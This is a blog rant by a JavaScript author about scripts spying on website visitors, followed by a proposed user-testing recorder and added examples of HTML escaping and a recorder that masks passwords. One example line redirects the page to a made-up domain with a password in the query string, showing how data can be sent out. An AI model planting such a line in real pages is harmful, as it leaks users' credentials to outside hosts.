Ajax: Spying on users (personal rant)
This is a little rant on a topic I see pop up from place to place: using Ajax techniques to spy on you. All I can say to this is yes, we can use the XMLHttpRequest object to pass back information without your control. With JavaScript I can monitor every single thing you do on a website, as long as the script runs in the same domain. The same-domain part needs to be stressed, since it means a website cannot read my passwords on another site.
But the sad thing is this: we can do it without the XMLHttpRequest object. All we need is an iframe, a pop-up window, or a form. We send the information via a link, document.location.href = "http://asdfoyweoryjrbkerbmwnervb.com/?password=123", or by submitting a form: document.formName.submit();. Either way the browser makes the request for us, and since the script chooses the destination, the data can be sent to any domain at all.
You always hear developers saying that they have used these techniques for years. I used them in JavaScript games I developed to transfer high score information. Go only to websites you can trust, and make sure that you, as a developer, block all JavaScript injection in your guestbooks, blogs, wikis, and so on, the same way you guard your SQL databases against injection. We do not need to help others gain information.
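As an added example (not code from the original post), here is the kind of escaping that keeps visitor-supplied text in a guestbook from turning into executable script. The function names and the sample entry are my own; the idea is that anything typed by a visitor is written to the page as text, never as markup.

```javascript
// Added example: escaping untrusted guestbook text before it is written into
// the page, so a visitor's "<script>" is displayed literally, not executed.

// Characters that carry meaning in HTML, mapped to their entity forms.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Replace every character that could open a tag, attribute or entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Build the HTML for one guestbook entry. Both the name and the message
// come from the visitor, so both are escaped before being concatenated.
function renderGuestbookEntry(name, message) {
  return '<li><b>' + escapeHtml(name) + '</b>: ' + escapeHtml(message) + '</li>';
}

// Constructed sample input (hypothetical visitor trying to plant a script).
const SAMPLE_NAME = 'visitor';
const SAMPLE_MESSAGE = 'Nice site! <script>alert("hi")</script>';

// Rendered safely, the tag survives only as text inside the list item.
console.log(renderGuestbookEntry(SAMPLE_NAME, SAMPLE_MESSAGE));
```

The same rule applies wherever user text lands in HTML: escape at the point of output, and escape attribute values as well as element content, because a stray quote inside an attribute is enough to start an event handler.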
Now why would a person use monitoring techniques with Ajax? I have been keeping this quiet, but I thought I would tell the world what I am working on. Some people see monitoring users' actions as a very scary situation; for me it is a blessing for testing. I have started work on developing a tool that can be deployed on an application during the user-testing phase of a project. Its main purpose is to sit in the background of a web page and attach itself to the controls on the page. It will monitor all of the user's actions and record them on a timeline. This information is then sent to a server to be stored for processing. Mouse movement, key presses, mouse clicks, and so on will be monitored and recorded to a database.
What can we do with this information stored in a database? I am working on a playback feature that will recreate all of the user's interactions on the page, so we can see exactly which action caused an error. I know that when you ask a user what they did, they just say: "I have no clue." Instead of banging our heads to figure out the chain of events that raised the error, we can watch the 'movie'. I also want to get this little application tied into NUnit to help record testing scenarios. We never know exactly what the users do, but their 'movie' will show it exactly.
This tool is going to be a rather large thing to accomplish, and it will need a lot of testing in the future.
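To make the timeline and playback idea concrete, here is an added example of my own, not the author's tool: a small recorder that attaches to a control through the standard DOM addEventListener, stores each event with its offset from the start of the recording, and a scheduler that turns the stored timeline back into the delays a playback would wait between steps. The class and function names are assumptions. One caveat a tester will want built in from the start is visible here: key presses into password fields are kept on the timeline so the sequence of actions is complete, but the characters themselves are masked, so the stored 'movie' never contains a password.

```javascript
// Added example: an interaction recorder with a replayable timeline.
// The clock is injectable so the timeline can be exercised without a browser.
class InteractionRecorder {
  constructor(now = () => Date.now()) {
    this.now = now;        // function returning the current time in ms
    this.start = null;     // timestamp when recording began
    this.events = [];      // the timeline: { t, type, target, detail }
  }

  begin() {
    this.start = this.now();
    this.events = [];
  }

  // Store one event with its offset (ms) from the start of the recording.
  // Keystrokes aimed at a password field are recorded, but the key is masked.
  record(type, target, detail = {}) {
    if (this.start === null) this.begin();
    const isSecret = Boolean(target && target.type === 'password');
    this.events.push({
      t: this.now() - this.start,
      type,
      target: target && target.id ? target.id : null,
      detail: isSecret && 'key' in detail ? { key: '*' } : { ...detail },
    });
  }

  // Hook the recorder onto a control. Mouse events keep the pointer position,
  // key events keep the key (subject to masking above).
  attach(element, types = ['click', 'keydown', 'mousemove']) {
    for (const type of types) {
      element.addEventListener(type, (ev) => {
        const detail = type === 'keydown'
          ? { key: ev.key }
          : { x: ev.clientX, y: ev.clientY };
        this.record(type, element, detail);
      });
    }
  }

  // The 'movie': a JSON-serialisable copy of the timeline for the server.
  timeline() {
    return this.events.map((ev) => ({ ...ev, detail: { ...ev.detail } }));
  }
}

// Convert a stored timeline into playback steps: each step carries the delay
// to wait before it, so the viewer sees the interactions at the original pace.
function playbackSchedule(timeline) {
  const sorted = timeline.slice().sort((a, b) => a.t - b.t);
  let previous = 0;
  return sorted.map((ev) => {
    const step = { delayMs: ev.t - previous, type: ev.type, target: ev.target, detail: ev.detail };
    previous = ev.t;
    return step;
  });
}

// Constructed demonstration with a fake clock and a fake control.
let fakeClock = 1000;
const recorder = new InteractionRecorder(() => fakeClock);
recorder.begin();
fakeClock = 1050; recorder.record('click', { id: 'loginBtn', type: 'button' });
fakeClock = 1200; recorder.record('keydown', { id: 'pwd', type: 'password' }, { key: 's' });
console.log(JSON.stringify(playbackSchedule(recorder.timeline())));
```

In a real deployment the timeline would be posted to the server in batches rather than kept in memory, and mousemove would be sampled rather than recorded on every pixel; the masking rule for sensitive fields should be applied before anything leaves the browser, not on the server.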
Eric Pascarello
Moderator of HTML/JavaScript at www.JavaRanch.com
Author of: JavaScript: Your Visual Blueprint for Dynamic Web Pages